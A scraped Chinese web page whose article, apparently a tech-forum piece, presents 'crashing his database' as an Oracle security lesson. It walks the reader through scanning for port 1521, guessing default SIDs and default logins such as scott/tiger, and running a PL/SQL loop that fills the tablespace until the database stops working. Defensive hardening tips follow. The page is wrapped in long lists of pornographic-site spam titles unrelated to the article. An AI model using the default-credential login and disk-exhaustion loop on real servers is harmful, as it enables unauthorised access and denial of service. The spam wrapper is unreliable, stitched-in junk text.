成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

搞垮他的數據庫--談Oracle安全

瀏覽:112日期:2023-11-14 14:19:19
--田月 人們經常聽到Windows的安全漏洞,頻繁的遭受病毒攻擊等,我們的傳統觀念是 Windows太不安全了;實際上Unix/Linux假如配置不當,其危險性遠遠高出人們的想象,大部分人非常重視操作系統的安全,但作為其最重要的數據庫應用,你注重它了么?本文旨在介紹數據庫級的安全,當然操作系統被攻破的話,那一切免談。 讓我帶你去試著攻擊一臺裝有Oracle的機器1、首先確定被攻擊Oracle的IP地址(無目的,那就去全網掃描吧,發現1521端口打開的就挑出來,不要說連掃描都不會,F..t)2、猜測它的SID號;好象很困難,事實上安裝Oracle時有缺省值,80%的人安裝時都不會去修改,或改為很輕易猜測的值,比如:ORCL、ORA、ORA8、ORA9、ORACLE、ORACLE8、ORACLE9、ORACLE8I、ORACLE817、ORACLE92...3、連接后,猜測用戶名和口令;好象更困難,事實上安裝 Oracle時,SYS、SYSTEM等系統用戶有缺省口令,可惜在9i中,終于改為需用戶自己確定口令(不過大部分用戶還是沿用以前的口令或使用'oracle'),而且還有被人們遺忘的用戶,比如SCOTT,缺省安裝時他會被建立起來的。4、sqlplus scott/tiger@ora_sid 終于登陸進來,可是這個小用戶只是用來做測試學習的,我們用他來干什么呢?鍵入:SQL> select USERNAME,DEFAULT_TABLESPACE from USER_USERS;USERNAME;;;;DEFAULT_TABLESPACE------------------------------ ------------------------------SCOTT; USERSSQL> select * from session_privs;PRIVILEGE----------------------------------------CREATE SESSIONALTER SESSIONUNLIMITED TABLESPACECREATE TABLECREATE CLUSTERCREATE SYNONYMCREATE VIEWCREATE SEQUENCECREATE DATABASE LINKCREATE PROCEDURECREATE TRIGGERCREATE TYPECREATE OPERATORCREATE INDEXTYPESQL> select * from user_ts_quotas;TABLESPACE_NAME;;BYTES; MAX_BYTES;;BLOCKS MAX_BLOCKS------------------------------ ---------- ---------- ---------- ----------SYSTEM;;524288; 0 64; 0USERS;;;;65536; 0; 8; 0什么意思呢?意思是我們的這個用戶是數據缺省是建在USERS表空間上的,擁有建表等權限,而USERS表空間的磁盤使用是無限制的,聰明的讀者應該明白我們可以在這里寫入很多數據直到占滿它的磁盤,造成數據庫無法使用......我們試試吧先建張表SQL> CREATE TABLE TEST (A CHAR(30));這張TEST表只有一個字段A再寫個PL/SQL過程DECLAREv_number varchar2(30);m_number varchar2(30):=999999999999999999999999999999;--m_number的值代表了插入多少行數據,可修改但不能超過30位。 beginFOR v_number IN 1..m_number LOOPinsert into TEST(A) values(m_number);commit;end LOOP;end;/ 上面的PL/SQL過程表示給TEST表中A列循環插入'999999999999999999999999999999'值,共計999999999999999999999999999999行。以每行30 byte來算,共計2000000多億T大小吧,即便他是IBM大鯊魚的陣列存儲,也扛不住。 當然,你也可以增加幾個列,減少m_number值,可以加快速度的。 這里再提醒大家一個Oracle缺省用戶DBSNMP,幾乎所有稍高版本的典型安裝都會創建它,危險指數高于SCOTT,因為它是創建在SYSTEM表空間的......F..t 講了半天,DBA們快看看自己的系統,一般來說成功率相當高。下面我們開始講講如何作好安全防護:1、啟用防火墻。很多單位的數據庫都沒有防火墻保護,或防火墻配置為透明。實際上防火墻可以有效的阻止掃描 ,假如做了NAT、地址限制、禁止ICMP等就更好了,讓別人在外網看不到你的數據庫。2、加大多層結構數據庫應用的建設。傳統的C/S盡管有很多優勢,但在安全性上實在令人擔心。很多程序開發者會將數據庫的用戶名和密碼直接寫在客戶端程序中,認為編譯后會很安全,但事實上你用文本編輯器打開過這個客戶端程序嗎?你會吃驚的發現竟然可以看到用戶名和密碼。多層結構就沒有這個問題,前臺就是個瀏覽器或簡單的客戶端,可能會影響效率但在需要全網公開提供服務的情況下肯定是首選。3、去除Oracle里用不到的組件,比如Jserver、Agent、遠程治理等等,這些強大的功能都是安全隱患,9I的AS存在緩沖溢出漏洞,假如你裝了就做祈禱吧...4、修改缺省用戶的密碼,自建用戶加強口令治理和復雜度。用system用戶進入執行SQL> select username from dba_users;USERNAME------------------------------SYSSYSTEMOUTLNDBSNMPTESTSCOTTRMANTEST1SQL> select * from session_privs;PRIVILEGE----------------------------------------CREATE SESSIONALTER SESSIONCREATE TABLECREATE CLUSTERCREATE SYNONYMCREATE VIEWCREATE SEQUENCECREATE DATABASE LINKSELECT ANY DICTIONARY看看你系統到底存在哪些用戶,口令修改了嗎,夠復雜嗎,相應的權限是否有擴大的嫌疑?5、作好數據備份具體這里就不多說了,CSDN相關版塊里有具體的帖子描述Oracle備份機制。6、合理劃分文件系統*在Unix/Linux下使用df -k檢查你的文件系統,不同用戶使用不同的表空間,不同的表空間建在不同的文件系統,千萬不要把應用建在SYSTEM表空間上,回滾/重做表空間的治理也不容忽視;SQL> host df -kFilesystem1K-blocks;;;Used Available Use% Mounted on/dev/hda2;;;503631621008322679652; 44% //dev/hda3;;;50363164381292;399192; 92% /oraclenone;256144 0;2561440% /dev/shm/dev/hda5;;;2016016;8631441050460; 46% /data1/dev/hda7;;;6166948;5581765295508; 10% /data2/dev/cdrom;;;;81762;;81762 0 100% /mnt/cdromSQL> select file_name,tablespace_name from dba_data_filFILE_NAME-------------------------------------------------------TABLESPACE_NAME------------------------------/oracle/prodUCt/9.2.01/oradata/system.dbfSYSTEM/oracle/product/9.2.01/oradata/undotbs.dbfUNDOTBS/data1/oradata/data1.dbfDATA1/data2/oradata/data2.dbfDATA2*在Windows下,使用資源治理器檢查你的分區,不同的表空間建在不同的分區上,同樣千萬不要把SYSTEM表空間和應用放在一起。 當然,安全治理浩如煙海,這篇文章全當拋磚引玉......
標簽: Oracle 數據庫
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
日韩精品专区在线影院观看| 亚洲欧美综合| 欧美久久九九| 日韩欧美国产电影| 国产精品自在欧美一区| 欧美视频三区在线播放| 日韩专区在线视频| 制服诱惑一区二区| 亚洲欧美福利一区二区| 在线欧美福利| 亚洲久草在线视频| 一区二区三区福利| 亚洲一区二区三区自拍| 亚洲自拍高清| 亚洲va欧美va人人爽| 久久精品首页| 日韩精品电影在线| 成人国产视频在线观看| 欧美午夜不卡影院在线观看完整版免费| 欧美麻豆精品久久久久久| 亚洲精品成a人| 亚洲欧美亚洲| 欧美另类z0zxhd电影| 欧美日韩在线观看一区二区| 亚洲免费资源在线播放| 国产日韩欧美一区二区三区在线观看| 亚洲免费观看高清| 国产日韩高清一区二区三区在线| 亚洲一级二级在线| 香蕉久久国产| 日产精品久久久久久久性色| 欧美优质美女网站| 国产一区二三区| www激情久久| 欧美a级理论片| 欧美日韩在线不卡| 国产999精品久久| 日韩一区二区在线看片| 在线免费观看不卡av| 婷婷中文字幕一区三区| 91久久精品日日躁夜夜躁欧美| 免费在线观看视频一区| 制服丝袜在线91| 99综合影院在线| 国产精品传媒入口麻豆| 国产精品永久| 久久国产日韩欧美精品| 精品剧情v国产在线观看在线| 午夜亚洲福利| 亚洲精品日韩综合观看成人91| 久久不射2019中文字幕| 精品在线亚洲视频| 日韩精品一区二| 欧美全黄视频| 午夜精品久久久久影视| 在线不卡中文字幕| 欧美日韩国产精品一区二区亚洲| 亚洲欧美激情在线| 色婷婷综合久久久久中文一区二区| 国产在线精品免费| 国产欧美日韩不卡免费| 国产一级久久| 国产在线播放一区| 国产色婷婷亚洲99精品小说| 国产欧美69| 狠狠色综合播放一区二区| 欧美精品一区二区久久久| 国内自拍视频一区二区三区 | 久久久国产综合精品女国产盗摄| 91女人视频在线观看| 国产精品乱码人人做人人爱 | 在线成人av网站| eeuss影院一区二区三区| 最新热久久免费视频| 在线看一区二区| 91网站黄www| 中文字幕亚洲在| 国模无码大尺度一区二区三区| 久久久水蜜桃| 国产一区二区三区在线看麻豆| 日韩三级在线免费观看| 成人18精品视频| 国产精品国产三级国产a| 亚洲一区精品视频| 久久精品国产一区二区三| 日韩欧美视频在线| 欧美日韩另类丝袜其他| 亚洲精品老司机| 葵司免费一区二区三区四区五区| 精品一区二区三区视频在线观看 | 亚洲激情图片一区| 色婷婷激情一区二区三区| 精品写真视频在线观看| 精品福利一区二区三区| 韩日欧美一区| 日韩二区在线观看| 日韩欧美视频在线| 伊人成人在线视频| 免费人成精品欧美精品| 日韩一级高清毛片| 黄色成人在线网站| 免播放器亚洲一区| 久久久www成人免费无遮挡大片| 亚洲一区二区在线免费观看视频 | 午夜精品久久久久| 久久久99久久精品欧美| 色综合久久久久久久久| 欧美/亚洲一区| 久久精品国产亚洲a| 中文字幕在线观看不卡| 欧美二区三区的天堂| 亚洲激情亚洲| 成人av电影免费在线播放| 首页国产欧美日韩丝袜| 亚洲欧美日韩精品在线| 亚洲婷婷在线视频| 亚洲美女少妇无套啪啪呻吟| 九九在线精品视频| 亚洲经典三级| 麻豆一区二区在线| 一区二区三区中文字幕| 国产亚洲人成网站| 69堂亚洲精品首页| 一本久久精品一区二区| 激情综合自拍| 99久久婷婷国产精品综合| 精品伊人久久久久7777人| 亚洲国产一区二区在线播放| 国产精品美日韩| 欧美电视剧在线观看完整版| 久久精品一二三区| 亚洲午夜精品久久久久久app| 福利一区二区在线| 免费成人你懂的| 一区二区三区精密机械公司| 欧美极品少妇xxxxⅹ高跟鞋| 日韩写真欧美这视频| 欧洲中文字幕精品| 亚洲综合精品四区| 在线视频观看日韩| 欧美高清不卡| 国产成人激情av| 久久国产精品区| 天堂一区二区在线| 亚洲精品视频观看| 亚洲国产精品成人综合色在线婷婷 | 欧美吞精做爰啪啪高潮| 国产精品亚洲产品| 99av国产精品欲麻豆| 欧美不卡一区| 99久久综合99久久综合网站| 国产老肥熟一区二区三区| 欧美a级理论片| 亚洲一区免费在线观看| 国产精品国产三级国产普通话99| 久久噜噜亚洲综合| 精品久久久久香蕉网| 日韩一区二区三区电影| 欧美综合在线视频| 久久国产主播精品| 国产精品一区二区三区免费观看| 伊人色综合久久天天五月婷| 国产一区二区h| 国产精品综合av一区二区国产馆| 激情偷乱视频一区二区三区| 久久精品噜噜噜成人av农村| 奇米影视一区二区三区| 免费观看一级特黄欧美大片| 亚洲第一电影网| 亚洲一区二区三区四区在线免费观看 | 一级精品视频在线观看宜春院 | 亚洲色图欧美偷拍| 中文字幕二三区不卡| 国产亚洲美州欧州综合国| 日韩欧美国产不卡| 欧美一级生活片| 欧美一区二区三区视频在线观看| 777精品伊人久久久久大香线蕉| 欧美日韩成人在线一区| 欧美日韩精品系列| 制服丝袜亚洲网站| 精品国产一区二区亚洲人成毛片 | 国产精品女上位| 中文字幕乱码亚洲精品一区| 国产精品国产三级国产aⅴ入口 | www.色综合.com| 91一区二区在线| 欧美日韩亚洲国产精品| 亚洲无毛电影| 国产精品一区二区在线观看| 翔田千里一区二区| 久久精品导航| 在线日韩一区二区| 欧美日韩成人综合天天影院 | 国产乱人伦精品一区二区在线观看| 国产精品系列在线观看| 成人少妇影院yyyy| 欧美日韩免费观看一区=区三区| 欧美特黄a级高清免费大片a级| 欧美日韩免费高清|